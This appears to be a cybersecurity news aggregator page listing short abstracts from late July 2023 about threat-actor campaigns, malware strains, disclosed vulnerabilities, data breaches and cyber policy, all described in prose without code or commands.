The threat actor known as Space Pirates has been linked to attacks against at least 16 organizations in Russia and Serbia over the past year by employing novel tactics and adding new cyber weapons to its arsenal. "The cybercriminals' main goals are still espionage and theft of confidential information, but the group has expanded its interests and the geography of its attacks," Positive Technologies said in a deep dive report published last week. Targets comprise government agencies, educational institutions, private security companies, aerospace manufacturers, agricultural producers, defense, energy, and healthcare firms in Russia and Serbia. Space Pirates was first exposed by the Russian cybersecurity company in May 2022, highlighting its attacks on the aerospace sector in the nation. The group, said to be active since at least late 2019, has links to another adversary tracked by Symantec as Webworm. Positive Technologies' analysis of the attack infrastThe Hacker News
August 1, 2023 – Vulnerabilities
Be aware of exposure of sensitive data on Wi-Fi settings for Canon inkjet printers Full Text
Abstract
Canon warns that sensitive data on the Wi-Fi connection settings stored in the memories of inkjet printers may not be deleted during initialization. Canon warns that sensitive information on the Wi-Fi connection settings stored in the memories of home...Security Affairs
August 1, 2023 – Outage
Mattress Giant Tempur Sealy Hit with Cyberattack Forcing System Shutdown Full Text
Abstract
The company’s chief financial officer Bhaskar Rao reported to the U.S. Securities and Exchange Commission on Monday morning that Tempur Sealy’s operations had been hindered by a cyberattack that began on July 23.Cyware
August 01, 2023
China’s APT31 Suspected in Attacks on Air-Gapped Systems in Eastern Europe Full Text
Abstract
A nation-state actor with links to China is suspected of being behind a series of attacks against industrial organizations in Eastern Europe that took place last year to siphon data stored on air-gapped systems. Cybersecurity company Kaspersky attributed the intrusions with medium to high confidence to a hacking crew called APT31, which is also tracked under the monikers Bronze Vinewood, Judgement Panda, and Violet Typhoon (formerly Zirconium), citing commonalities in the tactics observed. The attacks entailed the use of more than 15 distinct implants and their variants, broken down into three broad categories based on their ability to establish persistent remote access, gather sensitive information, and transmit the collected data to actor-controlled infrastructure. "One of the implant types appeared to be a sophisticated modular malware, aimed at profiling removable drives and contaminating them with a worm to exfiltrate data from isolated, or air-gapped, networks of indusThe Hacker News
August 1, 2023 – Ransomware
Spike in Ransomware Delivery via URLs, Reports Unit 42 Full Text
Abstract
Ransomware delivered through URLs has become the leading method for distributing ransomware, accounting for over 77% of cases in 2022 - found Unit 42. This is followed by emails at 12%. Researchers observed attackers using different URLs/hostnames to host or deliver different malware, including ran...Cyware
August 01, 2023 – Criminals
Cybercriminals Renting WikiLoader to Target Italian Organizations with Banking Trojan Full Text
Abstract
Organizations in Italy are the target of a new phishing campaign that leverages a new strain of malware called WikiLoader with an ultimate aim to install a banking trojan, stealer, and spyware referred to as Ursnif (aka Gozi). "It is a sophisticated downloader with the objective of installing a second malware payload," Proofpoint said in a technical report. "The malware uses multiple mechanisms to evade detection and was likely developed as a malware that can be rented out to select cybercriminal threat actors." WikiLoader is so named due to the malware making a request to Wikipedia and checking that the response has the string "The Free." The enterprise security firm said it first detected the malware in the wild on December 27, 2022, in connection with an intrusion set mounted by a threat actor it tracks as TA544, which is also known as Bamboo Spider and Zeus Panda. The campaigns are centered around the use of emails containing either MicroThe Hacker News
August 1, 2023 – Policy and Law
Meta Subsidiaries Must Pay $14M Over Misleading Data Collection Disclosure Full Text
Abstract
Facebook's subsidiaries, including Onavo, have been ordered to pay $14 million in an Australian court case for undisclosed data collection through a now-discontinued VPN, highlighting the company's privacy issues.Cyware
July 31, 2023 – Government
White House Unveils National Cyber Workforce Strategy Full Text
Abstract
"Cyber education and workforce development have not kept pace with demand and the rapid pace of technological change," says the strategy document. "Moreover, skills in demand in the cyber workforce are evolving."Cyware
July 31, 2023 – Malware
New P2PInfect Worm Targets Redis Servers with Undocumented Breach Methods Full Text
Abstract
The P2PInfect peer-to-peer (P2P) worm has been observed employing previously undocumented initial access methods to breach susceptible Redis servers and rope them into a botnet. "The malware compromises exposed instances of the Redis data store by exploiting the replication feature," Cado Security researchers Nate Bill and Matt Muir said in a report shared with The Hacker News. "A common attack pattern against Redis in cloud environments is to exploit this feature using a malicious instance to enable replication. This is achieved via connecting to an exposed Redis instance and issuing the SLAVEOF command." The Rust-based malware was first documented by Palo Alto Networks Unit 42, calling out the malware's ability to exploit a critical Lua sandbox escape vulnerability (CVE-2022-0543, CVSS score: 10.0) to obtain a foothold into Redis instances. The campaign is believed to have commenced on or after June 29, 2023. However, the latest discovery suggests thThe Hacker News
July 31, 2023 – Malware
Experts discovered a previously undocumented initial access vector used by P2PInfect worm Full Text
Abstract
Cado Security observed a new variant of the P2PInfect worm targets Redis servers with a previously undocumented initial access vector. In July, Palo Alto Networks Unit 42 researchers discovered a new peer-to-peer (P2P) worm called P2PInfect that...Security Affairs
July 31, 2023 – General
Blocking Access to ChatGPT is a Short Term Solution to Mitigate Risk Full Text
Abstract
For every 10,000 enterprise users, an enterprise organization is experiencing approximately 183 incidents of sensitive data being posted to ChatGPT per month, according to Netskope.Cyware
July 31, 2023 – Attack
Patchwork Hackers Target Chinese Research Organizations Using EyeShell Backdoor Full Text
Abstract
Threat actors associated with the hacking crew known as Patchwork have been spotted targeting universities and research organizations in China as part of a recently observed campaign. The activity, according to KnownSec 404 Team, entailed the use of a backdoor codenamed EyeShell. Patchwork, also known by the names Operation Hangover and Zinc Emerson, is suspected to be a threat group that operates on behalf of India. Active since at least December 2015, attack chains mounted by the outfit have a narrow focus and tend to single out Pakistan and China with custom implants such as BADNEWS via spear-phishing and watering hole attacks. The adversarial collective has been found to share tactical overlaps with other cyber-espionage groups with an Indian connection, including SideWinder and the DoNot Team. Earlier this May, Meta disclosed that it took down 50 accounts on Facebook and Instagram operated by Patchwork, which took advantage of rogue messaging apps uploaded to theThe Hacker News
July 31, 2023 – Botnet
Experts link AVRecon bot to the malware proxy service SocksEscort Full Text
Abstract
The AVRecon botnet relies on compromised small office/home office (SOHO) routers since at least May 2021. In early July, researchers from Lumen Black Lotus Labs discovered the AVRecon botnet that targets small office/home office (SOHO) routers and infected...Security Affairs
July 31, 2023 – Solution
ZTNA Can Be More Than a VPN Replacement for Application Access Full Text
Abstract
Zero Trust Network Access (ZTNA) should leverage contextual information, implement continuous authentication mechanisms, and be application-aware to make access decisions and reduce the risk of unauthorized access.Cyware
July 31, 2023 – Education
Webinar: Riding the vCISO Wave: How to Provide vCISO Services Full Text
Abstract
Demand for Virtual CISO services is soaring. According to Gartner, the use of vCISO services among small and mid-size businesses and non-regulated enterprises was expected to grow by a whopping 1900% in just one year, from only 1% in 2021 to 20% in 2022! Offering vCISO services can be especially attractive for MSPs and MSSPs. By addressing their customers' needs for proactive cyber resilience, they can generate a growing amount of recurring revenue from existing and new customers. And all while differentiating themselves from the competition. vCISO services also enable upselling of additional products and services the MSP or MSSP specializes in. However, not all MSPs and MSSPs fully understand how to provide vCISO services. Some may be unsure about which services are expected from them. Others may not realize they are already providing vCISO services and have the potential to effortlessly broaden their offerings into a complete vCISO suite or package it differently to make it moreThe Hacker News
July 31, 2023 – Vulnerabilities
Three flaws in Ninja Forms plugin for WordPress impact 900K sites Full Text
Abstract
Experts warn of vulnerabilities impacting the Ninja Forms plugin for WordPress that could be exploited for escalating privileges and data theft. The Ninja Forms plugin for WordPress is affected by multiple vulnerabilities (tracked as CVE-2023-37979,...Security Affairs
July 31, 2023 – Breach
School Accreditation Organization Exposed Sensitive Information on Students, Parents, and Teachers Online Full Text
Abstract
An unprotected database belonging to the Southern Association of Independent Schools (SAIS) was found exposing sensitive data on students, parents, and teachers, including health records, social security numbers, and confidential security reports.Cyware
July 31, 2023 – Botnet
AVRecon Botnet Leveraging Compromised Routers to Fuel Illegal Proxy Service Full Text
Abstract
More details have emerged about a botnet called AVRecon, which has been observed making use of compromised small office/home office (SOHO) routers as part of a multi-year campaign active since at least May 2021. AVRecon was first disclosed by Lumen Black Lotus Labs earlier this month as malware capable of executing additional commands and stealing victims' bandwidth for what appears to be an illegal proxy service made available for other actors. It has also surpassed QakBot in terms of scale, having infiltrated over 41,000 nodes located across 20 countries worldwide. "The malware has been used to create residential proxy services to shroud malicious activity such as password spraying, web-traffic proxying, and ad fraud," the researchers said in the report. This has been corroborated by new findings from KrebsOnSecurity and Spur.us, which last week revealed that "AVrecon is the malware engine behind a 12-year-old service called SocksEscort, which rents hackeThe Hacker News
July 31, 2023 – Vulnerabilities
Experts warn attackers started exploiting Citrix ShareFile RCE flaw CVE-2023-24489 Full Text
Abstract
Researchers warn that threat actors started exploiting Citrix ShareFile RCE vulnerability CVE-2023-24489 in the wild. Citrix ShareFile is a widely used cloud-based file-sharing application, which is affected by the critical remote code execution (RCE)...Security Affairs
July 31, 2023 – Policy and Law
New Jersey Supreme Court to Hear Merck Insurance Dispute Over NotPetya Attack Full Text
Abstract
The New Jersey Supreme Court agreed to review the legal fight between Merck and several of the world’s top insurance providers involving $1.4 billion in claims stemming from the 2017 NotPetya cyberattack.Cyware
July 31, 2023 – Malware
Fruity Trojan Uses Deceptive Software Installers to Spread Remcos RAT Full Text
Abstract
Threat actors are creating fake websites hosting trojanized software installers to trick unsuspecting users into downloading a downloader malware called Fruity with the goal of installing remote access trojan tools like Remcos RAT. "Among the software in question are various instruments for fine-tuning CPUs, graphic cards, and BIOS; PC hardware-monitoring tools; and some other apps," cybersecurity vendor Doctor Web said in an analysis. "Such installers are used as a decoy and contain not only the software potential victims are interested in, but also the trojan itself with all its components." The exact initial access vector used in the campaign is unclear, but it could potentially range from phishing to drive-by downloads to malicious ads. Users who land on the fake site are prompted to download a ZIP installer package. The installer, besides activating the standard installation process, stealthily drops the Fruity trojan, a Python-based malware that unpacks an MPThe Hacker News
July 31, 2023 – Ransomware
VMware ESXi Servers Face New Threat from Abyss Locker Full Text
Abstract
MalwareHunterTeam reported a new variant of the Abyss Locker ransomware designed to target Linux-based VMware ESXi servers. It employs SSH brute force attacks to gain unauthorized access to servers. The ransomware has claimed data theft ranging from 35GB to 700GB. Researchers also suspect a connect...Cyware
July 31, 2023 – Vulnerabilities
Multiple Flaws Found in Ninja Forms Plugin Leave 800,000 Sites Vulnerable Full Text
Abstract
Multiple security vulnerabilities have been disclosed in the Ninja Forms plugin for WordPress that could be exploited by threat actors to escalate privileges and steal sensitive data. The flaws, tracked as CVE-2023-37979, CVE-2023-38386, and CVE-2023-38393, impact versions 3.6.25 and below, Patchstack said in a report last week. Ninja Forms is installed on over 800,000 sites. A brief description of each of the vulnerabilities is below - CVE-2023-37979 (CVSS score: 7.1) - A POST-based reflected cross-site scripting (XSS) flaw that could allow any unauthenticated user to achieve privilege escalation on a target WordPress site by tricking privileged users into visiting a specially crafted website. CVE-2023-38386 and CVE-2023-38393 - Broken access control flaws in the form submissions export feature that could enable a bad actor with Subscriber and Contributor roles to export all Ninja Forms submissions on a WordPress site. Users of the plugin are recommended to update to versionThe Hacker News
July 30, 2023 – General
In 2022, more than 40% of zero-day exploits used in the wild were variations of previous issues Full Text
Abstract
Google’s Threat Analysis Group (TAG) states that more than 40% of zero-day flaws discovered in 2022 were variants of previous issues. TAG researcher Maddie Stone wrote Google’s fourth annual year-in-review of zero-day...Security Affairs
July 30, 2023 – Vulnerabilities
New flaw in Ivanti Endpoint Manager Mobile actively exploited in the wild Full Text
Abstract
Software firm Ivanti disclosed another security vulnerability impacting Endpoint Manager Mobile (EPMM) that it said is being actively exploited. Ivanti disclosed a new security vulnerability impacting Endpoint Manager Mobile (EPMM), tracked as CVE-2023-35081 (CVSS...Security Affairs
July 30, 2023 – General
Security Affairs newsletter Round 430 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Now...Security Affairs
July 29, 2023 – Vulnerabilities
Exploitation of Recent Citrix ShareFile RCE Vulnerability Begins Full Text
Abstract
The vulnerability, tracked as CVE-2023-24489 (CVSS score of 9.1), was the result of errors leading to unauthenticated file upload, which could then be exploited to obtain RCE, says security firm Assetnote, which identified and reported the bug.Cyware
July 29, 2023 – Malware
New Android Malware CherryBlos Utilizing OCR to Steal Sensitive Data Full Text
Abstract
A new Android malware strain called CherryBlos has been observed making use of optical character recognition (OCR) techniques to gather sensitive data stored in pictures. CherryBlos, per Trend Micro, is distributed via bogus posts on social media platforms and comes with capabilities to steal cryptocurrency wallet-related credentials and act as a clipper to substitute wallet addresses when a string matching a predefined format is copied to the clipboard. Once installed, the app asks users to grant it accessibility permissions, which allows it to automatically grant itself additional permissions as required. As a defense evasion measure, users attempting to kill or uninstall the app by entering the Settings app are redirected back to the home screen. Besides displaying fake overlays on top of legitimate crypto wallet apps to steal credentials and make fraudulent fund transfers to an attacker-controlled address, CherryBlos utilizes OCR to recogThe Hacker News
July 29, 2023 – Malware
Update: More Malicious NPM Packages Found in Wake of Jumpcloud Supply Chain Hack Full Text
Abstract
An investigation by ReversingLabs researchers has uncovered evidence of more malicious npm packages, with links to the same infrastructure that also appear to target cryptocurrency providers.Cyware
July 29, 2023 – Solution
RFP Template for Browser Security Full Text
Abstract
Increasing cyber threats and attacks have made protecting organizational data a paramount concern for businesses of all sizes. A group of experts have recognized the pressing need for comprehensive browser security solutions and collaborated to develop "The Definitive Browser Security RFP Template." This resource helps streamline the process of evaluating and procuring browser security platforms. It provides organizations with a standardized approach to enhance their security posture by protecting the key employee workspace - the browser. The Importance of a Standardized RFP Template The RFP (Request for Proposal) template offers numerous advantages for organizations seeking robust browser security solutions. By promoting standardization, the RFP template ensures a consistent structure and format for proposals, saving time and effort for both the procurement team and vendors. Moreover, it facilitates clear and specific instructions to vendors, resulting in higher-qualitThe Hacker News
July 29, 2023 – Breach
CoinsPaid Blames North Korea-Linked APT Lazarus for Theft of $37M Worth of Cryptocurrency Full Text
Abstract
“On July 22nd, CoinsPaid experienced a hacker attack, resulting in the theft of USD 37.3M,” reads the announcement published by the company. “We believe Lazarus expected the attack on CoinsPaid to be much more successful.”Cyware
July 29, 2023 – Solution
Apple Sets New Rules for Developers to Prevent Fingerprinting and Data Misuse Full Text
Abstract
Apple has announced plans to require developers to submit reasons to use certain APIs in their apps starting later this year with the release of iOS 17, iPadOS 17, macOS Sonoma, tvOS 17, and watchOS 10 to prevent their abuse for data collection. "This will help ensure that apps only use these APIs for their intended purpose," the company said in a statement. "As part of this process, you'll need to select one or more approved reasons that accurately reflect how your app uses the API, and your app can only use the API for the reasons you've selected." The APIs that require reasons for use relate to the following: file timestamp APIs, system boot time APIs, disk space APIs, active keyboard APIs, and user defaults APIs. The iPhone maker said it's making the move to ensure that such APIs are not abused by app developers to collect device signals to carry out fingerprinting, which could be employed to uniquely identify users across different aThe Hacker News
July 29, 2023 – Business
Coro Buys Privatise to Infuse SASE With Network Connectivity Full Text
Abstract
The New York-based company said its acquisition of Jerusalem-based Privatise will provide Coro clients with a secure way to connect, manage and filter out malicious content, according to co-founder Dror Liwer.Cyware
July 29, 2023 – Government
Hackers Deploy “SUBMARINE” Backdoor in Barracuda Email Security Gateway Attacks Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday disclosed details of a "novel persistent backdoor" called SUBMARINE deployed by threat actors in connection with the hack on Barracuda Email Security Gateway (ESG) appliances. "SUBMARINE comprises multiple artifacts — including a SQL trigger, shell scripts, and a loaded library for a Linux daemon — that together enable execution with root privileges, persistence, command and control, and cleanup," the agency said. The findings come from an analysis of malware samples obtained from an unnamed organization that had been compromised by threat actors exploiting a critical flaw in ESG devices, CVE-2023-2868 (CVSS score: 9.8), which allows for remote command injection. Evidence gathered so far shows that the attackers behind the activity, a suspected China-nexus actor tracked by Mandiant as UNC4841, leveraged the flaw as a zero-day in October 2022 to gain initial access to victim envirThe Hacker News
July 29, 2023 – Government
CISA warns about SUBMARINE Backdoor employed in Barracuda ESG attacks Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warns of threat actors deploying the SUBMARINE Backdoor in Barracuda ESG attacks. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) published an alert on a malware variant,...Security Affairs
July 29, 2023 – Vulnerabilities
Weintek Weincloud Vulnerabilities Allowed Manipulation, Damaging of ICS Devices Full Text
Abstract
Several vulnerabilities discovered by a researcher from industrial cybersecurity firm TXOne Networks in a Weintek product could have been exploited to manipulate and damage industrial control systems (ICS).Cyware
July 29, 2023 – Vulnerabilities
Ivanti Warns of Another Endpoint Manager Mobile Vulnerability Under Active Attack Full Text
Abstract
Ivanti has disclosed yet another security flaw impacting Endpoint Manager Mobile (EPMM), formerly known as MobileIron Core, that it said has been weaponized as part of an exploit chain by malicious actors in the wild. The new vulnerability, tracked as CVE-2023-35081 (CVSS score: 7.8), impacts supported versions 11.10, 11.9, and 11.8, as well as those that are currently end-of-life (EoL). "CVE-2023-35081 enables an authenticated administrator to perform arbitrary file writes to the EPMM server," the company said in an advisory. "This vulnerability can be used in conjunction with CVE-2023-35078, bypassing administrator authentication and ACL restrictions (if applicable)." A successful exploit could allow a threat actor to write arbitrary files on the appliance, thereby enabling the malicious party to execute OS commands on the appliance as the tomcat user. "As of now we are only aware of the same limited number of customers impacted by CVE-2023-35078The Hacker News
July 29, 2023 – Malware
Now Abyss Locker also targets VMware ESXi servers Full Text
Abstract
A Linux variant of the Abyss Locker designed to target VMware ESXi servers appeared in the threat landscape, experts warn. The operators behind the Abyss Locker developed a Linux variant that targets VMware ESXi servers expanding their potential targets. VMware...Security Affairs
July 28, 2023 – Government
DOD, OMB expect September release of proposed CMMC rule Full Text
Abstract
The rule has been delayed several times as the DOD revamp its approach, including changing to the longer proposed rule-making process. Originally, the expectation was that CMMC would come out as an interim final rule to be finalized in 60 days.Cyware
July 28, 2023 – Malware
IcedID Malware Adapts and Expands Threat with Updated BackConnect Module Full Text
Abstract
The threat actors linked to the malware loader known as IcedID have made updates to the BackConnect (BC) module that's used for post-compromise activity on hacked systems, new findings from Team Cymru reveal. IcedID, also called BokBot, is a strain of malware similar to Emotet and QakBot that started off as a banking trojan in 2017, before switching to the role of an initial access facilitator for other payloads. Recent versions of the malware have been observed removing functionality related to online banking fraud to prioritize ransomware delivery. The BackConnect (BC) module, first documented by Netresec in October 2022, relies on a proprietary command-and-control (C2) protocol to exchange commands between a server and the infected host. The protocol, which comes with a VNC component for remote access, has also been identified in other malware such as the now-discontinued BazarLoader and QakBot. In December 2022, Team Cymru reported the discovery of 11 BC C2s aThe Hacker News
July 28, 2023
Russian APT BlueBravo targets diplomatic entities with GraphicalProton backdoor Full Text
Abstract
Russia-linked BlueBravo has been spotted targeting diplomatic entities in Eastern Europe with the GraphicalProton Backdoor. The Russia-linked state-sponsored threat actor BlueBravo (aka APT29, Cloaked Ursa, Midnight Blizzard, and Nobelium) has been observed...Security Affairs
July 28, 2023 – Vulnerabilities
Innovative Attack Methodology Leverages the “search-ms” URI Protocol Handler Full Text
Abstract
A legitimate Windows search feature could be exploited by malicious actors to download arbitrary payloads from remote servers and compromise targeted systems with remote access trojans such as AsyncRAT and Remcos RAT.Cyware
July 28, 2023 – Phishing
STARK#MULE Targets Koreans with U.S. Military-themed Document Lures Full Text
Abstract
An ongoing cyber attack campaign has set its sights on Korean-speaking individuals by employing U.S. Military-themed document lures to trick them into running malware on compromised systems. Cybersecurity firm Securonix is tracking the activity under the name STARK#MULE. "Based on the source and likely targets, these types of attacks are on par with past attacks stemming from typical North Korean groups such as APT37 as South Korea has historically been a primary target of the group, especially its government officials," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News. APT37, also known by the names Nickel Foxcroft, Reaper, Ricochet Chollima, and ScarCruft, is a North Korean nation-state actor that's known to exclusively focus on targets in its southern counterpart, specifically those involved in reporting on North Korea and supporting defectors. Attack chains mounted by the group have historically reliThe Hacker News
July 28, 2023 – Cryptocurrency
CoinsPaid blames North Korea-linked APT Lazarus for theft of $37M worth of cryptocurrency
Abstract
Crypto-payments service provider CoinsPaid suffered a cyber attack that resulted in the theft of $37,200,000 worth of cryptocurrency. CoinsPaid, a crypto-payment service provider, fell victim to a cyber attack, leading to the theft of $37,200,000... (Security Affairs)
July 28, 2023 – Phishing
Nitrogen Malvertising - Sneaky Malware in Search Ads
Abstract
A recently detected malvertising campaign, known as Nitrogen, has been discovered exploiting Google Search and Bing ads to target users searching for IT tools. The Nitrogen campaign predominantly focuses on technology and non-profit organizations in North America. It operates by posing as inst... (Cyware)
July 28, 2023 – Education
A Data Exfiltration Attack Scenario: The Porsche Experience
Abstract
As part of Checkmarx's mission to help organizations develop and deploy secure software, the Security Research team started looking at the security posture of major car manufacturers. Porsche has a well-established Vulnerability Reporting Policy (Disclosure Policy) [1], so it was considered in scope for our research, and we decided to start there and see what we could find. What we found is an attack scenario that results from chaining security issues found on different Porsche assets, a website and a GraphQL API, that could lead to data exfiltration. Data exfiltration is an attack technique that can impact businesses and organizations, regardless of size. When malicious users breach a company's or organization's systems and exfiltrate data, it can be a jarring and business-critical moment. Porsche has a diverse online presence - deploying several microsites, websites, and web applications. The Porsche Experience [2] is one website that allows registered users to... (The Hacker News)
July 28, 2023 – Insider Threat
Monitor Insider Threats but Build Trust First
Abstract
The issue of how to prevent insider threats without infringing on employee privacy is one that has been a hot topic of debate in recent years. Because insider threats are uniquely challenging to detect and identify, different methods are needed than... (Security Affairs)
July 28, 2023 – Insider Threat
CISA to Establish Network of Regional Election Advisers for 2024
Abstract
Announced by Director Jen Easterly on Tuesday, the 10 advisers will support election officials working in their respective areas in an effort to “build even stronger connective tissue between state and local election officials and … CISA.” (Cyware)
July 28, 2023 – Attack
Hackers Abusing Windows Search Feature to Install Remote Access Trojans
Abstract
A legitimate Windows search feature is being exploited by malicious actors to download arbitrary payloads from remote servers and compromise targeted systems with remote access trojans such as AsyncRAT and Remcos RAT. The novel attack technique, per Trellix, takes advantage of the "search-ms:" URI protocol handler, which offers the ability for applications and HTML links to launch custom local searches on a device, and the "search:" application protocol, a mechanism for calling the desktop search application on Windows. "Attackers are directing users to websites that exploit the 'search-ms' functionality using JavaScript hosted on the page," security researchers Mathanraj Thangaraju and Sijo Jacob said in a Thursday write-up. "This technique has even been extended to HTML attachments, expanding the attack surface." In such attacks, threat actors have been observed creating deceptive emails that embed hyperlinks or HTML attachme... (The Hacker News)
July 28, 2023 – Malware
Related CherryBlos and FakeTrade Android Malware Involved in Scam Campaigns
Abstract
The CherryBlos malware steals cryptocurrency wallet credentials and replaces withdrawal addresses, while the FakeTrade malware tricks users into downloading apps that promise increased income but prevent fund withdrawals. (Cyware)
July 28, 2023 – Attack
BlueBravo Deploys GraphicalProton Backdoor Against European Diplomatic Entities
Abstract
The Russian nation-state actor known as BlueBravo has been observed targeting diplomatic entities throughout Eastern Europe with the goal of delivering a new backdoor called GraphicalProton, exemplifying the continuous evolution of the threat. The phishing campaign is characterized by the use of legitimate internet services (LIS) for command-and-control (C2) obfuscation, Recorded Future said in a new report published Thursday. The activity was observed between March and May 2023. BlueBravo, also known by the names APT29, Cloaked Ursa, and Midnight Blizzard (formerly Nobelium), is attributed to Russia's Foreign Intelligence Service (SVR), and has in the past used Dropbox, Firebase, Google Drive, Notion, and Trello to evade detection and stealthily establish communications with infected hosts. To that end, GraphicalProton is the latest addition to a long list of malware targeting diplomatic organizations after GraphicalNeutrino (aka SNOWYAMBER), HALFRIG, and QUARTERRIG. (The Hacker News)
July 28, 2023 – Vulnerabilities
Major Security Flaw Discovered in Metabase BI Software – Urgent Update Required
Abstract
Users of Metabase, a popular business intelligence and data visualization software package, are being advised to update to the latest version following the discovery of an "extremely severe" flaw that could result in pre-authenticated remote code execution on affected installations. Tracked as CVE-2023-38646, the issue impacts open-source editions prior to 0.46.6.1 and Metabase Enterprise versions before 1.46.6.1. "An unauthenticated attacker can run arbitrary commands with the same privileges as the Metabase server on the server you are running Metabase on," Metabase said in an advisory released last week. The issue has also been addressed in the following older versions: 0.45.4.1 and 1.45.4.1, 0.44.7.1 and 1.44.7.1, and 0.43.7.2 and 1.43.7.2. While there is no evidence that the issue has been exploited in the wild, data gathered by the Shadowserver Foundation shows that 5,488 out of the total 6,936 Metabase instances are vulnerable as of July 26, 202... (The Hacker News)
July 28, 2023 – Government
Cybersecurity Agencies Warn Against IDOR Bugs Exploited for Data Breaches
Abstract
Cybersecurity agencies in Australia and the U.S. have published a joint cybersecurity advisory warning against security flaws in web applications that could be exploited by malicious actors to orchestrate data breach incidents and steal confidential data. This includes a specific class of bugs called Insecure Direct Object Reference (IDOR), a type of access control flaw that occurs when an application utilizes user-supplied input or an identifier for direct access to an internal resource, such as a database record, without any additional validations. A typical example of an IDOR flaw is the ability of a user to trivially change the URL (e.g., https://example[.]site/details.php?id=12345) to obtain unauthorized data of another transaction (i.e., https://example[.]site/details.php?id=67890). "IDOR vulnerabilities are access control vulnerabilities enabling malicious actors to modify or delete data or access sensitive data by issuing requests to a website or a web appli... (The Hacker News)
July 27, 2023 – Policy and Law
Group-IB Co-Founder Ilya Sachkov Sentenced to 14 Years in a Strict Prison Colony
Abstract
Ilya Sachkov, former CEO and co-founder of Group-IB, was sentenced to 14 years in a high security prison colony according to the Moscow court announcement. As per the announcement from the Moscow court, Ilya Sachkov, the former CEO and co-founder of Group-IB,... (Security Affairs)
July 27, 2023 – Government
CISA Analysis Shows Most Cyberattacks on Governments, Critical Infrastructure Involve Valid Credentials
Abstract
More than half of all cyberattacks on government agencies, critical infrastructure organizations, and state-level government bodies involved the use of valid accounts, according to a new report from the CISA. (Cyware)
July 27, 2023 – Vulnerabilities
GameOver(lay): Two Severe Linux Vulnerabilities Impact 40% of Ubuntu Users
Abstract
Cybersecurity researchers have disclosed two high-severity security flaws in the Ubuntu kernel that could pave the way for local privilege escalation attacks. Cloud security firm Wiz, in a report shared with The Hacker News, said the easy-to-exploit shortcomings have the potential to impact 40% of Ubuntu users. "The impacted Ubuntu versions are prevalent in the cloud as they serve as the default operating systems for multiple [cloud service providers]," security researchers Sagi Tzadik and Shir Tamari said. The vulnerabilities – tracked as CVE-2023-32629 and CVE-2023-2640 (CVSS scores: 7.8) and dubbed GameOver(lay) – are present in a module called OverlayFS and arise as a result of inadequate permissions checks in certain scenarios, enabling a local attacker to gain elevated privileges. Overlay Filesystem refers to a union mount file system that makes it possible to combine multiple directory trees or file systems into a single, unified filesystem. A brief descrip... (The Hacker News)
July 27, 2023 – Vulnerabilities
Zimbra fixed actively exploited zero-day CVE-2023-38750 in ZCS
Abstract
Zimbra addressed a zero-day vulnerability exploited in attacks aimed at Zimbra Collaboration Suite (ZCS) email servers. Two weeks ago Zimbra urged customers to manually install updates to fix a zero-day vulnerability, now tracked as CVE-2023-38750,... (Security Affairs)
July 27, 2023 – Outage
CardioComm Takes Systems Offline Following Cyberattack
Abstract
The attack, the company says, impacted its production server environments and has an impact on its business operations. Visitors to the company’s website are informed that CardioComm services are currently offline. (Cyware)
July 27, 2023 – Phishing
New Malvertising Campaign Distributing Trojanized IT Tools via Google and Bing Search Ads
Abstract
A new malvertising campaign has been observed leveraging ads on Google Search and Bing to target users seeking IT tools like AnyDesk, Cisco AnyConnect VPN, and WinSCP, and trick them into downloading trojanized installers with an aim to breach enterprise networks and likely carry out future ransomware attacks. Dubbed Nitrogen, the "opportunistic" activity is designed to deploy second-stage attack tools such as Cobalt Strike, Sophos said in a Wednesday analysis. Nitrogen was first documented by eSentire in June 2023, detailing an infection chain that redirects users to compromised WordPress sites hosting malicious ISO image files that ultimately culminate in the delivery of Python scripts and Cobalt Strike Beacons onto the targeted system. Then earlier this month, Trend Micro uncovered a similar attack sequence in which a fraudulent WinSCP application functioned as a stepping stone for a BlackCat ransomware attack. "Throughout the infection chain, the threat... (The Hacker News)
July 27, 2023 – Breach
DepositFiles exposed config file, jeopardizing user security
Abstract
DepositFiles, a popular web hosting service, left its environment configuration file accessible, revealing a trove of highly sensitive credentials. The recent tsunami of Cl0p-driven ransomware attacks via the MOVEit Transfer exploit is a painful... (Security Affairs)
July 27, 2023 – Breach
Up to 11 Million People Hit by MOVEit Hack at Government Services Firm Maximus
Abstract
According to Maximus, the attackers stole files containing personal information and protected health information, including Social Security numbers, “of at least 8 to 11 million individuals”. (Cyware)
July 27, 2023 – Education
The 4 Keys to Building Cloud Security Programs That Can Actually Shift Left
Abstract
As cloud applications are built, tested and updated, they wind their way through an ever-complex series of different tools and teams. Across hundreds or even thousands of technologies that make up the patchwork quilt of development and cloud environments, security processes are all too often applied in only the final phases of software development. Placing security at the very end of the production pipeline puts both devs and security on the back foot. Developers want to build and ship secure apps; security teams want to support this process by strengthening application security. However, today's security processes are legacy approaches that once worked brilliantly for the tight constraints of on-prem production, but struggle in quasi-public, ever-shifting cloud environments. As a result, security is an afterthought, and any attempt to squeeze siloed security into agile SDLC can swell the cost of patching by 600%. A new cloud security operating model is long overdue. Shift-le... (The Hacker News)
July 27, 2023 – Policy and Law
Group-IB CEO Ilya Sachkov sentenced to 14 years in a strict prison colony
Abstract
Ilya Sachkov, CEO and co-founder of Group-IB, was sentenced to 14 years in a high security prison colony according to the Moscow court announcement. As per the announcement from the Moscow court, Ilya Sachkov, the CEO and co-founder of Group-IB, has been... (Security Affairs)
July 27, 2023 – Criminals
China Allegedly Turns to Transnational Criminals to Spread Disinformation in Australia
Abstract
Australian researchers have found evidence that China is using fake social media accounts linked to transnational criminal groups to spread online propaganda and disinformation. (Cyware)
July 27, 2023 – Attack
Hackers Target Apache Tomcat Servers for Mirai Botnet and Crypto Mining
Abstract
